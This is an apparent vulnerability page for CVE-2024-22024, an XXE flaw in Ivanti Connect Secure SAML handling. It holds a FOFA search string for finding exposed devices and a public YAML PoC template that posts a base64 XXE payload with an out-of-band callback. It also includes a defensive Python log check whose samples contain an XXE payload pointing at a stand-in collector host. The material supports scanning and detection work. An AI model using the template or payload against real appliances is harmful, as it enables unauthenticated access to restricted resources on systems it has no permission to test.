An XML external entity (XXE) vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x) and ZTA gateways allows an attacker to access certain restricted resources without authentication.
fofa: body="welcome.cgi?p=logo"
PoC code [public]
id: CVE-2024-22024
info:
  name: Ivanti Pulse Connect Secure VPN XXE
  author: zan8in
  severity: critical
  verified: true
  description: |-
    An XML external entity or XXE vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x) and ZTA gateways which allows an attacker to access certain restricted resources without authentication.
    fofa: body="welcome.cgi?p=logo"
  reference:
    - https://mp.weixin.qq.com/s/4wqtZaUNbZ3LGGWFGu8ziQ
    - https://nvd.nist.gov/vuln/detail/CVE-2024-22024
  tags: cve,cve2024,ivanti,xxe
  created: 2024/02/27
set:
  oob: oob()
  oobHTTP: oob.HTTP
  base64payload: base64("<?xml version=\"1.0\" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM \"" + oobHTTP + "\"> %watchTowr;]><r></r>")
rules:
  r0:
    request:
      method: POST
      path: /dana-na/auth/saml-sso.cgi
      body: "SAMLRequest={{base64payload}}"
    expression: oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0()
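
A defender-side check for the request shape this template sends, as an added example that is not part of the original page or of the template author's tooling: it decodes the `SAMLRequest` form field of a POST to `/dana-na/auth/saml-sso.cgi` and flags any DTD declaration, including in UTF-16 encoded documents. The function names, the sample messages and the rule that a legitimate SAML request never carries `<!DOCTYPE` or `<!ENTITY` are assumptions of this example.

```python
import base64
import binascii
import re
from typing import Optional
from urllib.parse import parse_qs

SAML_PATH = "/dana-na/auth/saml-sso.cgi"  # endpoint the template posts to
# Assumption of this example: a legitimate SAML request never declares a DTD.
DTD_MARKER = re.compile(rb"<!(DOCTYPE|ENTITY)\b")

def decode_saml_request(body: str) -> Optional[bytes]:
    """Return the XML bytes carried in the SAMLRequest form field, or None."""
    values = parse_qs(body, keep_blank_values=True).get("SAMLRequest")
    if not values:
        return None
    raw = values[0].replace(" ", "+")  # an unencoded '+' is parsed as a space
    raw += "=" * (-len(raw) % 4)       # tolerate stripped base64 padding
    try:
        return base64.b64decode(raw)
    except (binascii.Error, ValueError):
        return None

def is_suspicious(method: str, path: str, body: str) -> bool:
    """True for a POST to the SAML SSO endpoint whose decoded XML declares a DTD."""
    if method.upper() != "POST" or path.split("?", 1)[0] != SAML_PATH:
        return False
    xml = decode_saml_request(body)
    # Dropping NUL bytes lets the ASCII pattern also match UTF-16 documents.
    return xml is not None and DTD_MARKER.search(xml.replace(b"\x00", b"")) is not None

def scan(requests):
    """Return the labels of (label, method, path, body) records that are flagged."""
    return [label for label, m, p, b in requests if is_suspicious(m, p, b)]

def form(xml: bytes) -> str:
    """Build a form body the way the template does: plain base64, not URL-encoded."""
    return "SAMLRequest=" + base64.b64encode(xml).decode()

# Constructed samples, not captured traffic.
BENIGN = b'<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="_c1" Version="2.0"/>'
WITH_DTD = b'<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % e SYSTEM "http://collector.invalid/"> %e;]><r></r>'
SAMPLES = [
    ("benign", "POST", SAML_PATH, form(BENIGN)),
    ("dtd", "POST", SAML_PATH, form(WITH_DTD)),
    ("dtd-utf16", "POST", SAML_PATH, form(WITH_DTD.decode().encode("utf-16"))),
    ("other-path", "POST", "/index.html", form(WITH_DTD)),
]

if __name__ == "__main__":
    print(scan(SAMPLES))
```

The check is a triage aid for web or proxy logs that retain request bodies; it says nothing about whether the appliance itself is patched.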